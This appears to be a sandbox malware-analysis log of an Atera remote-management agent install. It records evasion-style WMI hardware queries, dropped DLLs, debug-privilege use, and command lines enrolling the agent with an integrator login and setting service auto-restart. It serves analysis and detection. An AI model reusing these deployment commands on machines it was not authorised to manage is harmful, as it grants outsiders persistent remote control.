                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 158ECAF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 158EE5D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 188971A0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 188AF700000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2AC50600000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2AC68700000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2C453010000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2C46B5F0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 20EC3970000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 20EDC050000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 2283
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 7315
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8A93.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmpJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8C79.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI87B3.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8B30.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7013.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 7940Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5660Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5472Thread sleep count: 2283 > 30
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5472Thread sleep count: 7315 > 30
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1552Thread sleep time: -22136092888451448s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1552Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2040Thread sleep count: 50 > 30
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2040Thread sleep time: -500000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2156Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1848Thread sleep time: -270000s >= -30000s
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2384Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4580Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6756Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1488Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8044Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7616Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4100Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 30000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                              Source: AgentPackageAgentInformation.exe.15.drBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW B
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2648055048.00000188B0460000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW V4
                              Source: AteraAgent.exe, 0000000D.00000002.1533766772.00000158EC97D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBno
                              Source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~7
                              Source: rundll32.exe, 00000012.00000002.1600208840.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1599197834.0000000002E56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                              Source: AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BD96000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393367410.0000020EDC8A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: AgentPackageAgentInformation.exe, 00000013.00000002.1778616808.000002AC68FD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2"Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgentJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgentJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="paul.fraxom@yzistanbul.me" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000kso2piab" /agentid="2094f497-2e94-42f0-b27c-add7e377a9d2"
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
